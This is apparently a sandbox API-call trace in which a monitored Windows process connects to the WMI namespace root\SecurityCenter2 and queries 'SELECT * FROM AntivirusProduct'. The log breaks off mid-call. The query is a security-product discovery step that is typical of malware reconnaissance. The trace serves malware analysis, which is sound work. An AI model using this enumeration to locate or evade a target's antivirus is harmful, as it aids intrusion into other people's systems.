WbemDefPath:IClassFactory:CreateInstance (in: This=0x5b30120, pUnkOuter=0x0, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ce4 | out: ppvObject=0x189ce4*=0x5b2ff18) returned 0x0 [0234.299] WbemDefPath:IUnknown:Release (This=0x5b30120) returned 0x0 [0234.299] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b2ff18, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189904 | out: ppvObject=0x189904*=0x5b2ff18) returned 0x0 [0234.299] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b2ff18, riid=0x749afc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1898c0 | out: ppvObject=0x1898c0*=0x0) returned 0x80004002 [0234.299] WbemDefPath:IUnknown:AddRef (This=0x5b2ff18) returned 0x3 [0234.299] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b2ff18, riid=0x749af90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x18921c | out: ppvObject=0x18921c*=0x0) returned 0x80004002 [0234.299] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b2ff18, riid=0x749af860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1891cc | out: ppvObject=0x1891cc*=0x0) returned 0x80004002 [0234.299] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b2ff18, riid=0x7499c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1891d8 | out: ppvObject=0x1891d8*=0x7e1f70) returned 0x0 [0234.299] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7e1f70, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1891e0 | out: pCid=0x1891e0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0234.299] WbemDefPath:IUnknown:Release (This=0x7e1f70) returned 0x3 [0234.299] CoGetContextToken (in: pToken=0x189238 | out: pToken=0x189238) returned 0x0 [0234.299] CoGetContextToken (in: pToken=0x189640 | out: pToken=0x189640) returned 0x0 [0234.299] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b2ff18, riid=0x749afb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1896d0 | out: ppvObject=0x1896d0*=0x0) returned 0x80004002 [0234.300] WbemDefPath:IUnknown:Release (This=0x5b2ff18) returned 0x2 [0234.300] WbemDefPath:IUnknown:Release (This=0x5b2ff18) returned 0x1 [0234.300] CoGetContextToken (in: pToken=0x189fc8 | out: pToken=0x189fc8) returned 0x0 [0234.300] CoGetContextToken (in: pToken=0x189f28 | out: pToken=0x189f28) returned 0x0 [0234.300] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b2ff18, riid=0x189ff8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x189ff4 | out: ppvObject=0x189ff4*=0x5b2ff18) returned 0x0 [0234.300] WbemDefPath:IUnknown:AddRef (This=0x5b2ff18) returned 0x3 [0234.300] WbemDefPath:IUnknown:Release (This=0x5b2ff18) returned 0x2 [0234.300] WbemDefPath:IWbemPath:SetText (This=0x5b2ff18, uMode=0x4, pszPath="root\\SecurityCenter2") returned 0x0 [0234.300] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5b2ff18, puCount=0x18a174 | out: puCount=0x18a174*=0x2) returned 0x0 [0234.300] WbemDefPath:IWbemPath:GetText (in: This=0x5b2ff18, lFlags=4, puBuffLength=0x18a170*=0x0, pszText=0x0 | out: puBuffLength=0x18a170*=0x19, pszText=0x0) returned 0x0 [0234.300] WbemDefPath:IWbemPath:GetText (in: This=0x5b2ff18, lFlags=4, puBuffLength=0x18a170*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x18a170*=0x19, pszText="\\\\.\\root\\SecurityCenter2") returned 0x0 [0234.300] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5b2ff18, puCount=0x18a160 | out: puCount=0x18a160*=0x2) returned 0x0 [0234.300] WbemDefPath:IWbemPath:GetText (in: This=0x5b2ff18, lFlags=4, puBuffLength=0x18a15c*=0x0, pszText=0x0 | out: puBuffLength=0x18a15c*=0x19, pszText=0x0) returned 0x0 [0234.300] WbemDefPath:IWbemPath:GetText (in: This=0x5b2ff18, lFlags=4, puBuffLength=0x18a15c*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x18a15c*=0x19, pszText="\\\\.\\root\\SecurityCenter2") returned 0x0 [0234.300] CoGetObjectContext (in: riid=0x27987bc*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18a0f0 | out: ppv=0x18a0f0*=0x766114) returned 0x0 [0234.300] IComThreadingInfo:GetCurrentApartmentType (in: This=0x766114, pAptType=0x18a0e8 | out: pAptType=0x18a0e8*=1) returned 0x0 [0234.300] IUnknown:QueryInterface (in: This=0x766114, riid=0x27987a4*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x18a0ec | out: ppvObject=0x18a0ec*=0x0) returned 0x80004002 [0234.300] IUnknown:Release (This=0x766114) returned 0x1 [0234.301] CoGetClassObject (in: rclsid=0x7b5574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7490d1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x189d10 | out: ppv=0x189d10*=0x5b358e0) returned 0x0 [0234.301] WbemLocator:IUnknown:QueryInterface (in: This=0x5b358e0, riid=0x74940ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x189f28 | out: ppvObject=0x189f28*=0x0) returned 0x80004002 [0234.301] WbemLocator:IClassFactory:CreateInstance (in: This=0x5b358e0, pUnkOuter=0x0, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f3c | out: ppvObject=0x189f3c*=0x5b3baf8) returned 0x0 [0234.301] WbemLocator:IUnknown:Release (This=0x5b358e0) returned 0x0 [0234.301] WbemLocator:IUnknown:QueryInterface (in: This=0x5b3baf8, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189b5c | out: ppvObject=0x189b5c*=0x5b3baf8) returned 0x0 [0234.301] WbemLocator:IUnknown:QueryInterface (in: This=0x5b3baf8, riid=0x749afc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189b18 | out: ppvObject=0x189b18*=0x0) returned 0x80004002 [0234.301] WbemLocator:IUnknown:AddRef (This=0x5b3baf8) returned 0x3 [0234.301] WbemLocator:IUnknown:QueryInterface (in: This=0x5b3baf8, riid=0x749af90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x189474 | out: ppvObject=0x189474*=0x0) returned 0x80004002 [0234.301] WbemLocator:IUnknown:QueryInterface (in: This=0x5b3baf8, riid=0x749af860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x189424 | out: ppvObject=0x189424*=0x0) returned 0x80004002 [0234.301] WbemLocator:IUnknown:QueryInterface (in: This=0x5b3baf8, riid=0x7499c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189430 | out: ppvObject=0x189430*=0x0) returned 0x80004002 [0234.301] CoGetContextToken (in: pToken=0x189490 | out: pToken=0x189490) returned 0x0 [0234.301] CoGetContextToken (in: pToken=0x189898 | out: pToken=0x189898) returned 0x0 [0234.301] WbemLocator:IUnknown:QueryInterface (in: This=0x5b3baf8, riid=0x749afb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189928 | out: ppvObject=0x189928*=0x0) returned 0x80004002 [0234.301] WbemLocator:IUnknown:Release (This=0x5b3baf8) returned 0x2 [0234.301] WbemLocator:IUnknown:Release (This=0x5b3baf8) returned 0x1 [0234.301] CoGetContextToken (in: pToken=0x189f08 | out: pToken=0x189f08) returned 0x0 [0234.302] CoGetContextToken (in: pToken=0x189e68 | out: pToken=0x189e68) returned 0x0 [0234.302] WbemLocator:IUnknown:QueryInterface (in: This=0x5b3baf8, riid=0x189f38*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x189f34 | out: ppvObject=0x189f34*=0x5b3baf8) returned 0x0 [0234.302] WbemLocator:IUnknown:AddRef (This=0x5b3baf8) returned 0x3 [0234.302] WbemLocator:IUnknown:Release (This=0x5b3baf8) returned 0x2 [0234.302] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5b2ff18, puCount=0x18a0cc | out: puCount=0x18a0cc*=0x2) returned 0x0 [0234.302] WbemDefPath:IWbemPath:GetText (in: This=0x5b2ff18, lFlags=8, puBuffLength=0x18a0c8*=0x0, pszText=0x0 | out: puBuffLength=0x18a0c8*=0x19, pszText=0x0) returned 0x0 [0234.302] WbemDefPath:IWbemPath:GetText (in: This=0x5b2ff18, lFlags=8, puBuffLength=0x18a0c8*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x18a0c8*=0x19, pszText="\\\\.\\root\\SecurityCenter2") returned 0x0 [0234.302] CoCreateInstance (in: rclsid=0x73cf1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x73cf12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x189f90 | out: ppv=0x189f90*=0x5b3bb08) returned 0x0 [0234.302] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5b3bb08, strNetworkResource="\\\\.\\root\\SecurityCenter2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x18a038 | out: ppNamespace=0x18a038*=0x5b3bc14) returned 0x0 [0234.325] WbemLocator:IUnknown:QueryInterface (in: This=0x5b3bc14, riid=0x73cf1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ec0 | out: ppvObject=0x189ec0*=0x7a1a9c) returned 0x0 [0234.325] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x7a1a9c, pProxy=0x5b3bc14, pAuthnSvc=0x189f10, pAuthzSvc=0x189f0c, pServerPrincName=0x189f04, pAuthnLevel=0x189f08, pImpLevel=0x189ef8, pAuthInfo=0x189efc, pCapabilites=0x189f00 | out: pAuthnSvc=0x189f10*=0xa, pAuthzSvc=0x189f0c*=0x0, pServerPrincName=0x189f04, pAuthnLevel=0x189f08*=0x6, pImpLevel=0x189ef8*=0x2, pAuthInfo=0x189efc, pCapabilites=0x189f00*=0x1) returned 0x0 [0234.325] WbemLocator:IUnknown:Release (This=0x7a1a9c) returned 0x1 [0234.325] WbemLocator:IUnknown:QueryInterface (in: This=0x5b3bc14, riid=0x73cf10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189eb4 | out: ppvObject=0x189eb4*=0x7a1abc) returned 0x0 [0234.325] WbemLocator:IUnknown:QueryInterface (in: This=0x5b3bc14, riid=0x73cf1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189eb0 | out: ppvObject=0x189eb0*=0x7a1a9c) returned 0x0 [0234.325] WbemLocator:IClientSecurity:SetBlanket (This=0x7a1a9c, pProxy=0x5b3bc14, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0234.325] WbemLocator:IUnknown:Release (This=0x7a1a9c) returned 0x2 [0234.325] WbemLocator:IUnknown:Release (This=0x7a1abc) returned 0x1 [0234.325] CoTaskMemFree (pv=0x7b57a8) [0234.325] WbemLocator:IUnknown:Release (This=0x5b3bb08) returned 0x0 [0234.325] WbemLocator:IUnknown:QueryInterface (in: This=0x5b3bc14, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ab0 | out: ppvObject=0x189ab0*=0x7a1abc) returned 0x0 [0234.325] WbemLocator:IUnknown:QueryInterface (in: This=0x7a1abc, riid=0x749afc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189a6c | out: ppvObject=0x189a6c*=0x0) returned 0x80004002 [0234.326] WbemLocator:IUnknown:QueryInterface (in: This=0x7a1abc, riid=0x749afe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x18988c | out: ppvObject=0x18988c*=0x0) returned 0x80004002 [0234.326] WbemLocator:IUnknown:AddRef (This=0x7a1abc) returned 0x3 [0234.326] WbemLocator:IUnknown:QueryInterface (in: This=0x7a1abc, riid=0x749af90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1893cc | out: ppvObject=0x1893cc*=0x0) returned 0x80004002 [0234.326] WbemLocator:IUnknown:QueryInterface (in: This=0x7a1abc, riid=0x749af860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x18937c | out: ppvObject=0x18937c*=0x0) returned 0x80004002 [0234.326] WbemLocator:IUnknown:QueryInterface (in: This=0x7a1abc, riid=0x7499c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189388 | out: ppvObject=0x189388*=0x7a1a1c) returned 0x0 [0234.326] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7a1a1c, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x189390 | out: pCid=0x189390*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0234.326] WbemLocator:IUnknown:Release (This=0x7a1a1c) returned 0x3 [0234.327] CoGetContextToken (in: pToken=0x1893e8 | out: pToken=0x1893e8) returned 0x0 [0234.327] CoGetContextToken (in: pToken=0x1897f0 | out: pToken=0x1897f0) returned 0x0 [0234.327] WbemLocator:IUnknown:QueryInterface (in: This=0x7a1abc, riid=0x749afb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189880 | out: ppvObject=0x189880*=0x7a1aa4) returned 0x0 [0234.327] WbemLocator:IRpcOptions:Query (in: This=0x7a1aa4, pPrx=0x7a1abc, dwProperty=2, pdwValue=0x1898a8 | out: pdwValue=0x1898a8) returned 0x80004002 [0234.327] WbemLocator:IUnknown:Release (This=0x7a1aa4) returned 0x3 [0234.327] WbemLocator:IUnknown:Release (This=0x7a1abc) returned 0x2 [0234.327] CoGetContextToken (in: pToken=0x189dc0 | out: pToken=0x189dc0) returned 0x0 [0234.327] CoGetContextToken (in: pToken=0x189d20 | out: pToken=0x189d20) returned 0x0 [0234.327] WbemLocator:IUnknown:QueryInterface (in: This=0x7a1abc, riid=0x189df0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x189dec | out: ppvObject=0x189dec*=0x5b3bc14) returned 0x0 [0234.327] WbemLocator:IUnknown:AddRef (This=0x5b3bc14) returned 0x4 [0234.327] WbemLocator:IUnknown:Release (This=0x5b3bc14) returned 0x3 [0234.327] WbemLocator:IUnknown:Release (This=0x5b3bc14) returned 0x2 [0234.327] SysStringLen (param_1=0x0) returned 0x0 [0234.327] CoGetContextToken (in: pToken=0x189dd0 | out: pToken=0x189dd0) returned 0x0 [0234.327] WbemLocator:IUnknown:AddRef (This=0x7a1abc) returned 0x3 [0234.327] WbemLocator:IUnknown:QueryInterface (in: This=0x7a1abc, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189c64 | out: ppvObject=0x189c64*=0x7a1abc) returned 0x0 [0234.327] WbemLocator:IUnknown:Release (This=0x7a1abc) returned 0x3 [0234.327] WbemLocator:IUnknown:Release (This=0x7a1abc) returned 0x2 [0234.327] CoGetContextToken (in: pToken=0x189ec8 | out: pToken=0x189ec8) returned 0x0 [0234.327] WbemLocator:IUnknown:AddRef (This=0x5b3bc14) returned 0x3 [0234.327] IWbemServices:ExecQuery (in: This=0x5b3bc14, strQueryLanguage="WQL", strQuery="SELECT * FROM AntivirusProduct", lFlags=16, pCtx=0x0, ppEnum=0x18a0d4 | out: ppEnum=0x18a0d4*=0x5b3bb94) returned 0x0 [0234.337] IUnknown:QueryInterface (in: This=0x5b3bb94, riid=0x73cf1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f38 | out: ppvObject=0x189f38*=0x5b3bb98) returned 0x0 [0234.337] IClientSecurity:QueryBlanket (in: This=0x5b3bb98, pProxy=0x5b3bb94, pAuthnSvc=0x189f88, pAuthzSvc=0x189f84, pServerPrincName=0x189f7c, pAuthnLevel=0x189f80, pImpLevel=0x189f70, pAuthInfo=0x189f74, pCapabilites=0x189f78 | out: pAuthnSvc=0x189f88*=0xa, pAuthzSvc=0x189f84*=0x0, pServerPrincName=0x189f7c, pAuthnLevel=0x189f80*=0x6, pImpLevel=0x189f70*=0x2, pAuthInfo=0x189f74, pCapabilites=0x189f78*=0x1) returned 0x0 [0234.337] IUnknown:Release (This=0x5b3bb98) returned 0x1 [0234.337] IUnknown:QueryInterface (in: This=0x5b3bb94, riid=0x73cf10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f2c | out: ppvObject=0x189f2c*=0x7a19cc) returned 0x0 [0234.337] IUnknown:QueryInterface (in: This=0x5b3bb94, riid=0x73cf1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f28 | out: ppvObject=0x189f28*=0x5b3bb98) returned 0x0 [0234.337] IClientSecurity:SetBlanket (This=0x5b3bb98, pProxy=0x5b3bb94, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0234.338] IUnknown:Release (This=0x5b3bb98) returned 0x2 [0234.338] WbemLocator:IUnknown:Release (This=0x7a19cc) returned 0x1 [0234.338] CoTaskMemFree (pv=0x7b5748) [0234.339] IUnknown:QueryInterface (in: This=0x5b3bb94, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189b24 | out: ppvObject=0x189b24*=0x7a19cc) returned 0x0 [0234.339] WbemLocator:IUnknown:QueryInterface (in: This=0x7a19cc, riid=0x749afc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189ae0 | out: ppvObject=0x189ae0*=0x0) returned 0x80004002 [0234.339] WbemLocator:IUnknown:QueryInterface (in: This=0x7a19cc, riid=0x749afe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1898fc | out: ppvObject=0x1898fc*=0x0) returned 0x80004002 [0234.339] WbemLocator:IUnknown:AddRef (This=0x7a19cc) returned 0x3 [0234.339] WbemLocator:IUnknown:QueryInterface (in: This=0x7a19cc, riid=0x749af90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x18943c | out: ppvObject=0x18943c*=0x0) returned 0x80004002 [0234.339] WbemLocator:IUnknown:QueryInterface (in: This=0x7a19cc, riid=0x749af860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1893ec | out: ppvObject=0x1893ec*=0x0) returned 0x80004002 [0234.340] WbemLocator:IUnknown:QueryInterface (in: This=0x7a19cc, riid=0x7499c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1893f8 | out: ppvObject=0x1893f8*=0x7a192c) returned 0x0 [0234.340] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7a192c, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x189400 | out: pCid=0x189400*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0234.340] WbemLocator:IUnknown:Release (This=0x7a192c) returned 0x3 [0234.340] CoGetContextToken (in: pToken=0x189458 | out: pToken=0x189458) returned 0x0 [0234.340] CoGetContextToken (in: pToken=0x189860 | out: pToken=0x189860) returned 0x0 [0234.340] WbemLocator:IUnknown:QueryInterface (in: This=0x7a19cc, riid=0x749afb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1898f0 | out: ppvObject=0x1898f0*=0x7a19b4) returned 0x0 [0234.340] WbemLocator:IRpcOptions:Query (in: This=0x7a19b4, pPrx=0x7a19cc, dwProperty=2, pdwValue=0x189918 | out: pdwValue=0x189918) returned 0x80004002 [0234.340] WbemLocator:IUnknown:Release (This=0x7a19b4) returned 0x3 [0234.340] WbemLocator:IUnknown:Release (This=0x7a19cc) returned 0x2 [0234.340] CoGetContextToken (in: pToken=0x189e38 | out: pToken=0x189e38) returned 0x0 [0234.340] CoGetContextToken (in: pToken=0x189d98 | out: pToken=0x189d98) returned 0x0 [0234.340] WbemLocator:IUnknown:QueryInterface (in: This=0x7a19cc, riid=0x189e68*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x189e64 | out: ppvObject=0x189e64*=0x5b3bb94) returned 0x0 [0234.340] IUnknown:AddRef (This=0x5b3bb94) returned 0x4 [0234.340] IUnknown:Release (This=0x5b3bb94) returned 0x3 [0234.340] IUnknown:Release (This=0x5b3bb94) returned 0x2 [0234.340] WbemLocator:IUnknown:Release (This=0x5b3bc14) returned 0x2 [0234.340] SysStringLen (param_1=0x0) returned 0x0 [0234.340] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5b2ff18, puCount=0x18a120 | out: puCount=0x18a120*=0x2) returned 0x0 [0234.340] WbemDefPath:IWbemPath:GetText (in: This=0x5b2ff18, lFlags=4, puBuffLength=0x18a11c*=0x0, pszText=0x0 | out: puBuffLength=0x18a11c*=0x19, pszText=0x0) returned 0x0 [0234.340] WbemDefPath:IWbemPath:GetText (in: This=0x5b2ff18, lFlags=4, puBuffLength=0x18a11c*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x18a11c*=0x19, pszText="\\\\.\\root\\SecurityCenter2") returned 0x0 [0234.340] CoGetContextToken (in: pToken=0x189f70 | out: pToken=0x189f70) returned 0x0 [0234.340] IUnknown:AddRef (This=0x5b3bb94) returned 0x3 [0234.340] IEnumWbemClassObject:Clone (in: This=0x5b3bb94, ppEnum=0x18a130 